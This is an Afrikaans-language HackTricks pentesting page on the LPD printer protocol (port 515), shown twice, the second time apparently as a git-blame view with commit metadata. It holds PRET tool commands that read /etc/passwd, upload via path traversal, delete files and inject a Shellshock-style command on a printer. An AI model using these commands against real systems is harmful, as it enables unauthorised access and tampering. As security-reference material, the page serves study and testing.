hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### **Inleiding tot LPD Protokol**

In die 1980's is die **Line Printer Daemon (LPD) protokol** ontwikkel in Berkeley Unix, wat later deur RFC1179 geformaliseer is. Hierdie protokol werk oor poort 515/tcp, wat interaksies deur die `lpr` opdrag moontlik maak. Die essensie van druk via LPD behels die stuur van 'n **beheerlêer** (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n **data lêer** (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van **verskeie lêerformate** vir die datalêer toelaat, word die hantering van hierdie lêers bepaal deur die spesifieke LPD implementering. 'n Algemeen erkende implementering vir Unix-agtige stelsels is **LPRng**. Opmerklik is dat die LPD protokol uitgebuit kan word om **kwaadwillige PostScript** of **PJL drukwerk** uit te voer.

### **Gereedskap vir Interaksie met LPD Drukkers**

[**PRET**](https://github.com/RUB-NDS/PRET) stel twee noodsaaklike gereedskap bekend, `lpdprint` en `lpdtest`, wat 'n eenvoudige metode bied om met LPD-ondersteunde drukkers te kommunikeer. Hierdie gereedskap stel 'n reeks aksies in staat, van die druk van data tot die manipulasie van lêers op die drukker, soos aflaai, oplaai of verwyder:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
Vir individue wat belangstel om die wêreld van **printer hacking** verder te verken, kan 'n omvattende hulpbron hier gevind word: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).

# Shodan

* `port 515`


{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`### Inleiding tot LPD Protokol`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			In die 1980's is die Line Printer Daemon (LPD) protokol ontwikkel in Berkeley Unix, wat later deur RFC1179 geformaliseer is. Hierdie protokol werk oor poort 515/tcp, wat interaksies deur die `lpr` opdrag moontlik maak. Die essensie van druk via LPD behels die stuur van 'n beheerlêer (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n data lêer (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van verskeie lêerformate vir die datalêer toelaat, word die hantering van hierdie lêers bepaal deur die spesifieke LPD implementering. 'n Algemeen erkende implementering vir Unix-agtige stelsels is LPRng. Opmerklik is dat die LPD protokol uitgebuit kan word om kwaadwillige PostScript of PJL drukwerk uit te voer.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`### Gereedskap vir Interaksie met LPD Drukkers`
a 2024-02-08 21:36:35 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			[PRET](https://github.com/RUB-NDS/PRET) stel twee noodsaaklike gereedskap bekend, `lpdprint` en `lpdtest`, wat 'n eenvoudige metode bied om met LPD-ondersteunde drukkers te kommunikeer. Hierdie gereedskap stel 'n reeks aksies in staat, van die druk van data tot die manipulasie van lêers op die drukker, soos aflaai, oplaai of verwyder:
a 2024-02-08 21:36:35 +00:00			```python
			`# To print a file to an LPD printer`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`lpdprint.py hostname filename`
a 2024-02-08 21:36:35 +00:00			`# To get a file from the printer`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname get /etc/passwd`
a 2024-02-08 21:36:35 +00:00			`# To upload a file to the printer`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname put ../../etc/passwd`
a 2024-02-08 21:36:35 +00:00			`# To remove a file from the printer`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname rm /some/file/on/printer`
a 2024-02-08 21:36:35 +00:00			`# To execute a command injection on the printer`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'`
a 2024-02-08 21:36:35 +00:00			`# To send a mail through the printer`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname mail lpdtest@mailhost.local`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`Vir individue wat belangstel om die wêreld van printer hacking verder te verken, kan 'n omvattende hulpbron hier gevind word: [Hacking Printers](http://hacking-printers.net/wiki/index.php/Main_Page).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`# Shodan`
GitBook: [master] 379 pages modified 2020-10-05 17:40:56 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			* `port 515`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`<summary>Ondersteun HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:23:49 +00:00			`{% endhint %}`